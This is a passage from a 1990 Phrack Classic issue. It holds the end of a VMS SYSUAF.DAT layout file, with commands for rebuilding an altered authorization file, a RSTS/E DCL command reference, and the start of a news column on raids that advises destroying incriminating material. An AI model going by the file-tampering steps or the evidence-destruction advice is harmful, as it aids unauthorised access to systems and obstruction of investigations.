502 Filler (12 bytes) 12
|
|
514 Prime days 1
|
|
|
|
Bits 0-7 toggled on represents primedays, respective
|
|
to Mon, Tue, ..., Sun.
|
|
|
|
515 Filler (1 byte) 1
|
|
516 Default base priority 1
|
|
517 Maximum job queue priority 1
|
|
518 Active process limit 2
|
|
520 Max. number of interactive, detached, and batch jobs 2
|
|
524 Detached process limit 2
|
|
526 Subprocess creation limit 2
|
|
528 Buffered I/O count 2
|
|
530 Timer queue entry limit 2
|
|
532 AST queue limit 2
|
|
534 Lock queue limit 2
|
|
536 Open file limit 4
|
|
538 Shared file limit 2
|
|
540 Working set quota 4
|
|
548 Working set extent 4
|
|
552 Paging file quota 4
|
|
556 Maximum CPU time limit (in 10-milliseconds) 4
|
|
560 Buffered I/O byte limit 4
|
|
564 Paged buffer I/O byte count limit 4
|
|
568 Initial byte quota (jobwide logical name table uses) 4
|
|
572 Filler (72 bytes) 72
|
|
|
|
Dates and times are stored as 8 bytes representing the number of
|
|
seconds elapsed since November 17, 1858, 12:00:00 a.m.
|
|
|
|
Earlier versions of the VMS UAF will contain much of the same data,
|
|
which should be at the same offset as listed above.
|
|
|
|
|
|
Should you decide to attempt to modify the SYSUAF.DAT file, keep in
|
|
mind that if you download the file, when you upload it, it will not be the
|
|
same as it was before; it will not be an indexed file. You *might* be able
|
|
to create an .FDL file (using ANALYZE/RMS/FDL SYSUAF.DAT), and use that .FDL
|
|
file to convert it back to an indexed file
|
|
(with CONVERT/FDL=SYSUAF.FDL UPLOAD_UAF.DAT NEW_UAF.DAT), but chances that it
|
|
will contain the proper indexing and file attributes are slim. Remember when
|
|
altering the SYSUAF.DAT file to keep a copy around (on the system) in case
|
|
you need to repair the damage.
|
|
|
|
|
|
-PHz
|
|
|
|
Feel free to make any comments or corrections to the following address:
|
|
|
|
[phz@judy.indstate.edu]
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Classic==
|
|
|
|
Volume Three, Issue 32, File #9 of 12
|
|
|
|
|
|
/-?!?!?!?!?!?!?!?!?!?!?!-\
|
|
/EZ?! ?!AH\
|
|
/APE?! ?!ZAP\
|
|
/AZHP?! RSTS/E ?!EZHA\
|
|
/ ZEAH?! ?!PEAZ \
|
|
[*>RSTS PZA?! by ?!HPZ LIVES<*]
|
|
\ PHEZ?! ?!AHEE /
|
|
\HAPE?! Crimson Death ?!ZAPP/
|
|
\ZHP?! ?!EZH/
|
|
\AH?! ?!PE/
|
|
\-?!?!?!?!?!?!?!?!?!?!?!-/
|
|
|
|
|
|
Ok, ok... Just what you wanted... a file of RSTS!!! Hah...
|
|
Well.. One would be suprised on how many RSTS systems are still around
|
|
on variuos X.25 networks, not to mention they are soooo much fun!
|
|
Here is a little list of some various commands that is good to keep
|
|
lying around just to use as a reference of just for you nostaglic type
|
|
people like me. So enjoy, and if you were never involved in hacking
|
|
when RSTS was popular, you really missed something.
|
|
-------------------------------------------------------------------------------
|
|
|
|
*ALLOCATE
|
|
The ALLOCATE command reserves a physical device for your use during
|
|
the current session and optionally establishes a logical name for
|
|
the device. Once a device has been allocated, other users cannot access
|
|
the device until you specifically deallocate it or log out. You can
|
|
allocate a device only when it is not allocated by another job.
|
|
|
|
Format
|
|
|
|
ALLOCATE device-name[:] [logical-name[:]]
|
|
|
|
Prompts
|
|
|
|
Device: device-name
|
|
|
|
See also: ASSIGN, DEALLOCATE
|
|
|
|
*APPEND
|
|
The APPEND command adds the contents of one or more files to the end
|
|
of the file you specify. APPEND is similar in syntax and function to
|
|
the COPY command.
|
|
|
|
Format
|
|
|
|
APPEND [node::]input-file-spec[,...] [node::]output-file-spec
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/[NO]LOG /LOG
|
|
/[NO]QUERY /NOQUERY
|
|
|
|
Prompts
|
|
|
|
From: input-file-spec[,...]
|
|
|
|
To: output-file-spec
|
|
|
|
See also: COPY
|
|
|
|
*ASSIGN
|
|
The ASSIGN command lets you relate a logical name to a directory
|
|
or to a physical device. The names you ASSIGN stay in effect until
|
|
you log out, or log into another account or until you DEASSIGN the name.
|
|
|
|
Format
|
|
|
|
ASSIGN device-name:[[ppn]] logical-name[:]
|
|
|
|
Prompts
|
|
|
|
Device: device-name:[[ppn]]
|
|
|
|
Logical name: logical-name[:]
|
|
|
|
*BASIC
|
|
The BASIC command invokes the BASIC-PLUS or BASIC-PLUS-2 programming
|
|
environment, depending on the qualifiers you use and the system's
|
|
default. It also prepares RSTS/E for the development of BASIC programs.
|
|
|
|
Format
|
|
|
|
BASIC
|
|
|
|
Command Qualifiers Comments
|
|
|
|
/BP2 Invokes the BASIC-PLUS-2
|
|
programming environment
|
|
/BPLUS Invokes the BASIC-PLUS
|
|
programming environment
|
|
|
|
All subsequent commands are interpreted as BASIC programming commands,
|
|
until you type the following command to return to the DCL keyboard
|
|
monitor: DCL <ret>
|
|
|
|
*CCL
|
|
Format
|
|
|
|
CCL ccl-command
|
|
|
|
The Concise Command Language (CCL) allows you to enter a command name
|
|
rather than type RUN and a program name.
|
|
|
|
You can type CCL commands directly after DCL's dollar prompt ($).
|
|
The format of the CCL command is defined by your system manager.
|
|
For details about the use of a CCL command, refer to the
|
|
documentation written for your site.
|
|
|
|
When you are using the DCL Keyboard Monitor, DCL commands take
|
|
precedence over CCL commands. If your system manager gives a CCL
|
|
command the same name as a DCL command, you must type the prefix
|
|
"CCL" a space, and the CCL command itself.
|
|
|
|
For example, a CCL command name "DIRECTORY" and the DCL command
|
|
"DIRECTORY" may produce different results depending on how the CCL
|
|
command works at your site. To use the CCL version, type:
|
|
$ CCL DIRECTORY <ret>
|
|
|
|
*COBOL
|
|
The COBOL command compiles a COBOL-81 program. (Only one source file at a
|
|
time can be compiled with COBOL-81.)
|
|
|
|
|
|
Format:
|
|
|
|
COBOL file-spec
|
|
|
|
Qualifiers Defaults
|
|
|
|
/[NO]ANSI_FORMAT
|
|
/[NO]CHECK
|
|
/[NO]CROSS_REFERENCE
|
|
/LIST[=listfile] /NOLIST
|
|
/NOLIST
|
|
/[NO]MAP
|
|
/NAMES=aa /NAMES=SC
|
|
/OBJECT[=objfile] /OBJECT
|
|
/NOOBJECT
|
|
|
|
Prompts
|
|
|
|
File: file-spec
|
|
|
|
See also: LINK
|
|
|
|
*COPY
|
|
The COPY command duplicates one or more existing files.
|
|
You can use COPY to:
|
|
|
|
- copy one file to another file
|
|
- merge (concatenate) more than one file into a single file
|
|
- copy a group of files to another group of files
|
|
|
|
Format
|
|
|
|
COPY [node::]input-file-spec[,...] [node::]output-file-spec
|
|
|
|
Qualifiers Defaults
|
|
|
|
/ALLOCATION=n
|
|
/[NO]CONTIGUOUS (N)
|
|
/[NO]LOG (N) /LOG
|
|
/[NO]OVERLAY /NOOVERLAY
|
|
/PROTECTION=n
|
|
/[NO]QUERY (N) /NOQUERY
|
|
/[NO]REPLACE (N) /NOREPLACE
|
|
|
|
(N) denotes a qualifier that you can use in network operations.
|
|
|
|
Prompts
|
|
|
|
From: input-file-spec[,...]
|
|
|
|
To: output-file-spec
|
|
|
|
*CREATE
|
|
The CREATE command allows you to enter text and save it as a file.
|
|
|
|
Format
|
|
|
|
CREATE file-spec
|
|
|
|
Prompts
|
|
|
|
File: file-spec
|
|
|
|
Once you have entered the file-spec, press RETURN and you may start
|
|
typing text. Press <CTRL/Z> when you have finished entering text.
|
|
|
|
Command Qualifiers
|
|
|
|
/ALLOCATION=n
|
|
/[NO]CONTIGUOUS
|
|
/PROTECTION=n
|
|
/[NO]REPLACE
|
|
|
|
See also: EDIT
|
|
|
|
*DEALLOCATE
|
|
The DEALLOCATE command releases a device that you reserved for private
|
|
use, so that other users may have access to it. (However, DEALLOCATE
|
|
does not deassign any logical name you may have set up for the device.)
|
|
|
|
Format
|
|
|
|
DEALLOCATE device-name[:]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/ALL none
|
|
|
|
Prompts
|
|
|
|
Device: device-name[:]
|
|
|
|
See also: ALLOCATE
|
|
|
|
*DEASSIGN
|
|
The DEASSIGN command cancels logical name assignments you made with
|
|
the ASSIGN or ALLOCATE commands.
|
|
|
|
Format
|
|
|
|
DEASSIGN [logical-name[:]]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/ALL
|
|
|
|
Prompts
|
|
|
|
Logical name: logical-name[:]
|
|
|
|
See also: ASSIGN, DEALLOCATE
|
|
|
|
*DELETE/ENTRY
|
|
The DELETE/ENTRY command deletes jobs from the queue that have not
|
|
yet begun processing or jobs that are currently being processed.
|
|
|
|
Format
|
|
|
|
DELETE/ENTRY=job-number [queue-name[:]]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/BATCH
|
|
|
|
Prompts
|
|
|
|
Queue: queue-name[:]
|
|
|
|
If you do not specify a queue name, LP0: is assumed.
|
|
|
|
See also: PRINT, SUBMIT, DELETE/JOB, SET QUEUE/ENTRY
|
|
|
|
*DELETE/JOB
|
|
|
|
The DELETE/JOB command uses the name of a job to cancel a request
|
|
to the print or batch queue.
|
|
|
|
Format
|
|
|
|
DELETE/JOB=job-name [queue-name[:]]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/BATCH
|
|
|
|
For example, if you decide after you make your print request that you
|
|
do not want a hard copy of the file after all, you can use the
|
|
DELETE/JOB command to withdraw your request. (If the file is printed
|
|
before you enter the DELETE/JOB command, your request is too late.
|
|
However, it works if your file is in the middle of printing: the file
|
|
stops printing.)
|
|
|
|
See also: PRINT, SUBMIT, DELETE/ENTRY, SET QUEUE/JOB
|
|
|
|
*DELETE
|
|
The DELETE command permanently removes a file from your account.
|
|
|
|
Format
|
|
|
|
DELETE [node::]file-spec[,...]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/BEFORE=date
|
|
/CREATED /CREATED
|
|
/[NO]LOG /LOG
|
|
/MODIFIED
|
|
/[NO]QUERY /NOQUERY
|
|
/SINCE=date
|
|
|
|
Prompts
|
|
|
|
File: [node::]file-spec[,...]
|
|
|
|
*DIBOL
|
|
|
|
The DIBOL command compiles a DIBOL-11 program. You can include up to
|
|
six source file specifications to be compiled into a single object
|
|
file with the DIBOL compiler.
|
|
|
|
Format
|
|
|
|
DIBOL filespec[,...]
|
|
|
|
File Qualifiers Defaults
|
|
|
|
/LIST[=listfile] /NOLIST
|
|
/NOLIST
|
|
/OBJECT[=objfile] /OBJECT
|
|
/NOOBJECT
|
|
/WARNINGS /WARNINGS
|
|
/NOWARNINGS
|
|
|
|
See also: LINK
|
|
|
|
*DIFFERENCES
|
|
The DIFFERENCES command compares two files and lists any sections
|
|
of text that differ between the two files.
|
|
|
|
Format
|
|
|
|
DIFFERENCES input-file-spec compare-file-spec
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/IGNORE=BLANKLINES
|
|
/MATCH=size /MATCH=3
|
|
/MAXIMUM_DIFFERENCES=n
|
|
/OUTPUT[=file-spec]
|
|
|
|
Prompts:
|
|
|
|
File 1: input-file-spec
|
|
|
|
File 2: compare-file-spec
|
|
|
|
*DIRECTORY
|
|
The DIRECTORY command displays information about files.
|
|
Use the TYPE command to display the contents of individual files.
|
|
|
|
Format
|
|
|
|
DIRECTORY [node::][file-spec[,...]]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/BEFORE=date
|
|
/BRIEF /BRIEF
|
|
/CREATED /CREATED
|
|
/DATE[=CREATED] /NODATE
|
|
[=MODIFIED]
|
|
[=ALL]
|
|
/NODATE
|
|
/FULL /BRIEF
|
|
/MODIFIED /CREATED
|
|
/OUTPUT=outfile
|
|
/[NO]PROTECTION /PROTECTION
|
|
/SINCE=date
|
|
/SIZE[=ALLOCATION] /SIZE=USED
|
|
[=USED]
|
|
/NOSIZE
|
|
/TOTAL
|
|
|
|
|
|
*DISMOUNT
|
|
Releases a disk or tape previously accessed with a MOUNT command.
|
|
You issue this command before you take the drive off line, or before
|
|
you physically dismount the tape or disk.
|
|
|
|
The DISMOUNT command deallocates the device if it was allocated to
|
|
you. (On some systems, dismounting a disk requires privileges.)
|
|
You cannot DISMOUNT a device if there are open files on it. If you
|
|
try, RSTS/E displays the message:
|
|
|
|
?Account or device in use
|
|
|
|
Format
|
|
|
|
DISMOUNT device-name[:] [label]
|
|
|
|
Prompts
|
|
|
|
Device: device-name[:]
|
|
|
|
See also: MOUNT, DEALLOCATE
|
|
|
|
*EDIT
|
|
The EDIT command starts the EDT editor program, which lets
|
|
you create and edit text files.
|
|
|
|
Format
|
|
|
|
EDIT file-spec
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/COMMAND[=file-spec] /COMMAND=EDTINI.EDT
|
|
/NOCOMMAND /COMMAND=EDTINI.EDT
|
|
/JOURNAL[=file-spec] /JOURNAL
|
|
/NOJOURNAL /JOURNAL
|
|
/OUTPUT[=outfile] /OUTPUT
|
|
/NOOUTPUT /OUTPUT
|
|
/[NO]READ_ONLY /NOREAD_ONLY
|
|
/[NO]RECOVER /NORECOVER
|
|
/EDT /EDT
|
|
|
|
Prompts
|
|
|
|
File: file-spec
|
|
|
|
*FORTRAN
|
|
The FORTRAN command compiles up to six FORTRAN source files into
|
|
a single object file.
|
|
|
|
There are three FORTRAN compilers available on RSTS/E:
|
|
|
|
Command Invokes
|
|
|
|
FORTRAN/FOR FORTRAN-IV
|
|
FORTRAN/F4P FORTRAN-IV-PLUS
|
|
FORTRAN/F77 FORTRAN-77
|
|
|
|
FORTRAN/F77 is the default, unless your system manager has changed it.
|
|
|
|
Qualifiers which you may use with FORTRAN-IV are as follows:
|
|
|
|
Format
|
|
|
|
FORTRAN/FOR file-spec[,...]
|
|
|
|
Command Qualifiers
|
|
|
|
/CODE:EAE
|
|
EIS
|
|
FIS
|
|
THR
|
|
/[NO]D_LINES
|
|
/[NO]I4
|
|
/[NO]LINENUMBERS
|
|
/LIST[=listfile]
|
|
/NOLIST
|
|
/[NO]MACHINE_CODE
|
|
/OBJECT[=objfile]
|
|
/NOOBJECT
|
|
/[NO]OPTIMIZE
|
|
/[NO]WARNINGS
|
|
|
|
Qualifiers which you may use with FORTRAN-IV-PLUS or FORTRAN-77
|
|
are as follows:
|
|
|
|
Format
|
|
|
|
FORTRAN/F4P file-spec[,...] or FORTRAN/F77 file-spec[,...]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/[NO]CHECK /CHECK
|
|
/CONTINUATIONS=n /CONTINUATIONS=19
|
|
/[NO]D_LINES /NOD_LINES
|
|
/[NO]I4 /NO14
|
|
/LIST[=listfile] /NOLIST
|
|
/NOLIST
|
|
/[NO]MACHINE_CODE /NOMACHINE_CODE
|
|
/OBJECT[=objfile] /OBJECT
|
|
/NOOBJECT
|
|
/[NO]WARNINGS /WARNINGS
|
|
/WORK_FILES=n /WORK_FILES=2
|
|
|
|
Prompts
|
|
|
|
File: file-spec[,...]
|
|
|
|
See also: LINK
|
|
|
|
*HELP
|
|
Help can be obtained on a particular topic by typing:
|
|
|
|
HELP topic subtopic subsubtopic
|
|
|
|
A topic can have the following format:
|
|
|
|
1) An alphanumeric string (e.g. a command name, option, etc.)
|
|
2) Same preceded by a "/"
|
|
3) The match-all symbol "*"
|
|
|
|
Example:
|
|
|
|
HELP COPY
|
|
|
|
The RSTS/E DCL User's Guide contains a complete description of all
|
|
DCL commands supported on RSTS/E.
|
|
|
|
*INITIALIZE
|
|
Deletes any data on a tape and writes a new label.
|
|
|
|
The INITIALIZE command allocates the tape drive if it is not
|
|
already allocated.
|
|
|
|
Format
|
|
|
|
INITIALIZE device-name[:] [label]
|
|
|
|
Qualifiers
|
|
|
|
/FORMAT=ANSI
|
|
/FORMAT=DOS
|
|
/DENSITY=nnn
|
|
|
|
Prompts
|
|
|
|
Device: magtape[:]
|
|
Label: [label]
|
|
|
|
See also: MOUNT, DISMOUNT
|
|
|
|
*LINK
|
|
The LINK command links together object files to produce an
|
|
executable program. You can also specify an overlay structure
|
|
for the program.
|
|
|
|
Format
|
|
|
|
LINK file-spec[,...]
|
|
|
|
Language Qualifiers Comments
|
|
|
|
Only one of the following may be specified:
|
|
|
|
/BASIC or /BP2 BASIC-PLUS-2
|
|
/COBOL or /C81 COBOL-81
|
|
/DIBOL
|
|
/F4P FORTRAN-IV-PLUS
|
|
/F77 FORTRAN-77
|
|
/FORTRAN FORTRAN-IV
|
|
/RT11 MACRO/RT11
|
|
|
|
If no language qualifier is specified, /BASIC (for BASIC-PLUS-2)
|
|
is assumed, unless your system manager has changed the default.
|
|
|
|
Additional
|
|
Command Qualifiers Defaults
|
|
|
|
/EXECUTABLE[=file-spec] /EXECUTABLE
|
|
/NOEXECUTABLE
|
|
/[NO]FMS /NOFMS
|
|
/MAP[=file-spec] /NOMAP
|
|
/NOMAP
|
|
/STRUCTURE
|
|
/[NO]DMS /NODMS
|
|
|
|
Prompts
|
|
|
|
Files: file-spec
|
|
|
|
If /STRUCTURE was specified, you will be
|
|
prompted for the names of the input files
|
|
and overlay structure to use, e.g.,
|
|
|
|
ROOT files: file-spec[,...]
|
|
Root PSECTs: [PSECT-name[,...]]
|
|
Overlay: [file-spec[,...][+]]
|
|
|
|
You can specify /STRUCTURE if the program is written in
|
|
BASIC-PLUS-2, DIBOL, FORTRAN-IV-PLUS, or FORTRAN-77. You
|
|
cannot specify /STRUCTURE if the program is written in
|
|
COBOL, FORTRAN-IV, or MACRO/RT11.
|
|
|
|
See also: COBOL, DIBOL, BASIC, MACRO, FORTRAN
|
|
|
|
*LOGOUT
|
|
The LOGOUT command ends your session at the terminal.
|
|
|
|
Format
|
|
|
|
[LO]GOUT
|
|
|
|
Command Qualifiers
|
|
|
|
/BRIEF
|
|
/FULL (default)
|
|
|
|
If you include the /BRIEF qualifier after the LOGOUT command,
|
|
RSTS/E ends your session at the terminal without displaying a
|
|
message. If you include the /FULL, or simply type LOGOUT, RSTS/E
|
|
displays information about the status of your account.
|
|
|
|
*MACRO
|
|
Invokes a MACRO-11 assembler. You can include up to six file
|
|
specifications with the MACRO command.
|
|
|
|
On RSTS/E you can use either MACRO/RT11 or MACRO/RSX11. The default
|
|
is MACRO/RSX11 unless your system manager has changed it.
|
|
|
|
Format
|
|
|
|
MACRO/RT11 filespec[,...]
|
|
|
|
OR
|
|
|
|
MACRO/RSX11 filespec[,...]
|
|
|
|
Command Qualifiers
|
|
|
|
/LIST[=listfile]
|
|
/NOLIST
|
|
/OBJECT[=objfile]
|
|
/NOOBJECT
|
|
|
|
File Qualifiers
|
|
|
|
/LIBRARY
|
|
|
|
See also: LINK
|
|
|
|
*MOUNT
|
|
The MOUNT command prepares a tape or disk for processing by system
|
|
commands or user programs. (You do not always have to MOUNT a tape
|
|
before using it.) On some systems, mounting a disk requires privilege.
|
|
|
|
Format
|
|
|
|
MOUNT device-name[:] [label]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/[NO]WRITE /WRITE
|
|
|
|
Qualifiers for Tapes Defaults
|
|
|
|
/FORMAT=ANSI
|
|
/FORMAT=DOS
|
|
/FORMAT=FOREIGN
|
|
/DENSITY=nnn
|
|
|
|
Prompts
|
|
|
|
Device: device-name[:]
|
|
Label: volume-label
|
|
|
|
See also: DISMOUNT, INITIALIZE, ALLOCATE
|
|
|
|
*PRINT
|
|
The PRINT command queues a file for printing, either on a default
|
|
system printer or on a device you specify. A queue is the list of
|
|
files to be printed.
|
|
|
|
Format
|
|
|
|
PRINT file-spec[,...]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/AFTER=date-time
|
|
/FORMS=type /FORMS=NORMAL
|
|
/JOB_COUNT=n /JOB_COUNT=1
|
|
/NAME=job-name
|
|
/PRIORITY=n
|
|
/QUEUE=queue-name[:] /QUEUE=LP0:
|
|
|
|
File Qualifiers Defaults
|
|
|
|
/COPIES=n /COPIES=1
|
|
/[NO]DELETE /NODELETE
|
|
|
|
Prompts
|
|
|
|
File: file-spec[,...]
|
|
|
|
See also: DELETE/JOB, SET QUEUE/JOB
|
|
|
|
*RENAME
|
|
The RENAME command changes the file name or file type of an
|
|
existing file.
|
|
|
|
Format
|
|
|
|
RENAME old-file-spec[,...] new-file-spec
|
|
|
|
Qualifiers Defaults
|
|
|
|
/[NO]LOG /LOG
|
|
/[NO]QUERY /NOQUERY
|
|
/[NO]REPLACE /NOREPLACE
|
|
/PROTECTION=n /PROTECTION=60
|
|
|
|
Prompts
|
|
|
|
From: input-file-spec[,...]
|
|
|
|
To: output-file-spec
|
|
|
|
See also: COPY, DELETE
|
|
|
|
*REQUEST
|
|
The REQUEST command displays a message at a system operator's terminal.
|
|
|
|
Format
|
|
|
|
REQUEST message-text
|
|
|
|
When you use the REQUEST command to send a message to an operator,
|
|
the message is displayed at the operator services console.
|
|
|
|
*RUN
|
|
|
|
The RUN command runs an executable file.
|
|
|
|
Format
|
|
|
|
RUN file-spec
|
|
|
|
Prompts
|
|
|
|
Program: file-spec
|
|
|
|
*SET HOST
|
|
The SET HOST command lets you log into another computer from the
|
|
system you first logged into.
|
|
|
|
Format
|
|
|
|
SET HOST node[::]
|
|
|
|
Prompts
|
|
|
|
Node: node-name
|
|
|
|
*SET PROTECTION
|
|
The SET PROTECTION command specifies the protection code of a file.
|
|
You assign a protection code to determine who else, if anyone, can
|
|
have access to your files.
|
|
|
|
Format
|
|
|
|
SET PROTECTION[=n] [file-spec,...]
|
|
|
|
Qualifiers
|
|
|
|
/DEFAULT
|
|
/[NO]QUERY
|
|
/[NO]LOG
|
|
|
|
Prompts
|
|
|
|
Protection code: n
|
|
Files: file-spec
|
|
|
|
If you use SET PROTECTION/DEFAULT, RSTS/E assigns the protection
|
|
code you specify to all files you create during the current session.
|
|
However, do not include a file specification when you use
|
|
the /DEFAULT qualifier.
|
|
|
|
*SET QUEUE/ENTRY
|
|
The SET QUEUE/ENTRY command changes the status of a file that is queued
|
|
for printing or for batch job execution but is not yet processed by the
|
|
system.
|
|
|
|
Format
|
|
|
|
SET QUEUE/ENTRY=sequence-number [queue-name[:]]
|
|
|
|
Additional
|
|
Command Qualifiers Defaults
|
|
|
|
/AFTER=date-time none
|
|
/BATCH
|
|
/FORMS=type
|
|
/HOLD
|
|
/JOB_COUNT=n
|
|
/PRIORITY=n
|
|
/RELEASE
|
|
|
|
If you do not specify a queue name, LP0: is assumed.
|
|
|
|
See also: DELETE/ENTRY, SET QUEUE/JOB
|
|
|
|
*SET QUEUE/JOB
|
|
|
|
The SET QUEUE/JOB command uses the name of a job to modify the status
|
|
of a file that is queued for a printer or batch queue.
|
|
|
|
Format
|
|
|
|
SET QUEUE/JOB=job-name [queue-name[:]]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/AFTER=date-time None.
|
|
/BATCH
|
|
/FORMS=type
|
|
/HOLD
|
|
/JOB_COUNT=n
|
|
/PRIORITY=n
|
|
/RELEASE
|
|
|
|
When you submit a batch job or issue the PRINT command, the job is
|
|
assigned a name, according to the first input file specification or
|
|
the name you specify. You can use this name to modify the status of
|
|
the job in the queue.
|
|
|
|
See also: DELETE/JOB, SET QUEUE/ENTRY
|
|
|
|
*SET TERMINAL
|
|
The SET TERMINAL command lets you specify the characteristics of your
|
|
terminal. Privileged users can also set the characteristics of other
|
|
terminals.
|
|
|
|
Format
|
|
|
|
SET TERMINAL [device-name[:]]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/[NO]BROADCAST /NOBROADCAST
|
|
/CRFILL[=n] /CRFILL=0
|
|
/[NO]ECHO /ECHO
|
|
/[NO]HARDCOPY
|
|
/LA34
|
|
/LA36
|
|
/LA38
|
|
/LA120
|
|
/[NO]LOWERCASE
|
|
/PARITY=EVEN /NOPARITY
|
|
ODD
|
|
/NOPARITY
|
|
/[NO]SCOPE
|
|
/SPEED=n
|
|
/SPEED=(i,o)
|
|
/[NO]TAB /NOTAB
|
|
/[NO]TTSYNC /TTSYNC
|
|
/[NO]UPPERCASE
|
|
/VT05
|
|
/VT52
|
|
/VT55
|
|
/VT100
|
|
/WIDTH=n
|
|
|
|
See also: SHOW TERMINAL
|
|
|
|
*SHOW DEVICES
|
|
The SHOW DEVICES command displays the status of devices
|
|
that have disks mounted on them or that are allocated to jobs.
|
|
|
|
See also: MOUNT, ALLOCATE
|
|
|
|
*SHOW QUEUE
|
|
The SHOW/QUEUE command displays a list of entries in the printer
|
|
and/or batch job queues.
|
|
|
|
Format
|
|
|
|
SHOW QUEUE [queue-name[:]]
|
|
|
|
Command Qualifiers
|
|
|
|
/BATCH
|
|
/BRIEF
|
|
|
|
Queue: queue-name[:]
|
|
|
|
To display the queue of your system's default printer, type:
|
|
|
|
$ SHOW QUEUE
|
|
|
|
If there are no files in the queue, RSTS/E prints a message
|
|
similar to:
|
|
|
|
LP0 queue is empty
|
|
|
|
*SHOW NETWORK
|
|
The SHOW NETWORK command displays the systems you can connect
|
|
to by the network. If the network is operational, RSTS/E displays
|
|
the names of different nodes that your system can access.
|
|
|
|
Format
|
|
|
|
SHOW NETWORK
|
|
|
|
See also: SET HOST
|
|
|
|
*SHOW SYSTEM
|
|
The SHOW SYSTEM command displays information about use of the
|
|
system's resources. Specifically, it displays information about
|
|
the status of all jobs, attached and detached, in use on the system.
|
|
|
|
Format
|
|
|
|
SHOW SYSTEM
|
|
|
|
The only difference between SHOW SYSTEM and SHOW USERS is that the
|
|
SHOW SYSTEM command includes information about the status of detached
|
|
jobs.
|
|
|
|
See also: SHOW USERS
|
|
|
|
*SHOW TERMINAL
|
|
The SHOW TERMINAL command displays the characteristics of your
|
|
terminal. Most of these characteristics can be changed with a
|
|
corresponding option of the SET TERMINAL command. (Users with
|
|
privileged accounts can display the characteristics of other terminals.)
|
|
|
|
Format
|
|
|
|
SHOW TERMINAL [device-name[:]]
|
|
|
|
See also: SET TERMINAL
|
|
|
|
*SHOW USERS
|
|
The SHOW USERS command displays information about the status of
|
|
attached jobs on the system.
|
|
|
|
Format
|
|
|
|
SHOW USERS
|
|
|
|
See also: SHOW SYSTEM
|
|
|
|
*SUBMIT
|
|
The SUBMIT command enters one or more control files for batch processing.
|
|
|
|
Format
|
|
|
|
SUBMIT file-spec[,...]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/AFTER=date-time
|
|
/NAME=job-name
|
|
/PRIORITY=n /PRIORITY=128
|
|
/QUEUE=quename
|
|
|
|
File Qualifiers Defaults
|
|
|
|
/[NO]DELETE /NODELETE
|
|
|
|
Prompts
|
|
|
|
File: file-spec[,...]
|
|
|
|
See also: DELETE/JOB, SET QUEUE/JOB
|
|
|
|
*TYPE
|
|
The TYPE command displays the contents of a text file (as opposed
|
|
to a binary or temporary file).
|
|
|
|
Format
|
|
|
|
TYPE [node::]file-spec[,...]
|
|
|
|
Command Qualifiers Defaults
|
|
|
|
/OUTPUT=file-spec /OUTPUT=KB:
|
|
/[NO]QUERY /NOQUERY
|
|
|
|
Prompts
|
|
|
|
File: file-spec[,...]
|
|
|
|
To temporarily halt the display of a file, use <CTRL/S>. To resume
|
|
output where it was interrupted, use <CTRL/Q>. (On a VT100 terminal
|
|
you can also press the NO SCROLL key to stop and restart output.)
|
|
|
|
To suppress the display but continue command processing, use <CTRL/O>.
|
|
If you press <CTRL/O> again before processing is completed, output
|
|
resumes at the current point in command processing.
|
|
|
|
To stop command execution entirely, press <CTRL/C>. The use of
|
|
<CTRL/C> returns you to DCL command level.
|
|
|
|
See also: COPY
|
|
|
|
------------------------------------------------------------------------------
|
|
|
|
Hope that this file brought back memories for you guys. It did for me! 8^]
|
|
|
|
Crimson Death
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Classic==
|
|
|
|
Volume Three, Issue 32, File #10 of 12
|
|
|
|
|
|
KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
|
|
|
|
K N I G H T L I N E
|
|
|
|
Issue 001 / Part I
|
|
|
|
17th of November, 1990
|
|
|
|
Written, compiled,
|
|
|
|
and edited by Doc Holiday
|
|
|
|
KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
|
|
|
|
---
|
|
|
|
Welcome to the 5th year of Phrack and the first edition of KnightLine!
|
|
|
|
---
|
|
SunDevil II: The witch-hunt continues..
|
|
|
|
I hate to start out on such a sour note, but: Inside sources have reported an
|
|
enormous amount of Secret Service activity in major U.S. cities.
|
|
Furthermore, sources claim that new investigations are underway for the
|
|
prosecution of all Legion Of Doom members.
|
|
|
|
The investigations have "turned up" new evidence that could bring about
|
|
the sequel to SunDevil.
|
|
|
|
This information comes from reliable sources and I suggest that all precautions
|
|
should be taken to protect yourselves from a raid.
|
|
|
|
Some good advice to follow:
|
|
|
|
A> Refrain from using "codes", or other means to commit toll fraud.
|
|
|
|
B> Further yourselves from those who are overwhelmed with desire to tell
|
|
you their recent conquests of computer systems.
|
|
|
|
C> Refrain from downloading or storing stolen Unix source code.
|
|
|
|
D> Get rid of anything that might incriminate you or your peers.
|
|
|
|
E> Stay cool, calm, and collected.
|
|
|
|
|
|
The Conflict has submitted a file to KL about what to do IF YOU ARE raided.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
Simple Guidelines To Follow If You Encounter
|
|
Law Enforcement Agents In An Unfriendly Situation
|
|
|
|
The current state of the Computer Underground is an extreme turmoil.
|
|
The recent threat of another series of witchhunt raids has put many
|
|
people into a state of paranoia, and rightfully so. Noone needs to
|
|
deal with all the bullshit associated with a bust. I am offering a
|
|
few guidelines to follow if you encounter a precarious situation
|
|
instigated by a law enforcement agent; of course, it is up to you to
|
|
decide what you want to do. Of the people whom I have spoken with,
|
|
these will be some of the best steps to follow if you receive an
|
|
unexpected visit.
|
|
|
|
Probably the first thing you would want to do if you receive an
|
|
unfriendly visit from Joe Fed is to READ the damn warrant. Find
|
|
out why you have been chosen, and what they are looking for. Also,
|
|
remember that if they have only a search and seizure warrant, they
|
|
